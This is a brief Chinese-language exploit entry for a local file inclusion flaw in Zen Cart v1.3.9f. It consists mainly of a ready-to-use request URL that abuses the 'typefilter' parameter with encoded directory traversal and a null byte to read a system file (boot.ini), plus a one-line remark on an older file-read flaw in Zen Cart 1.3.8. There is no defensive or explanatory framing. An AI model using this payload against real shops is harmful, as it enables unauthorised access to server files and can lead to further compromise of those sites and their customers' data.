Zen Cart v1.3.9f (typefilter) 本地文件包含漏洞 Exp:

http://127.0.0.1/index.php?typefilter=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00

本地文件包含,记得 ZEN CART 1.3.8 还有个古老的本地文件读取漏洞。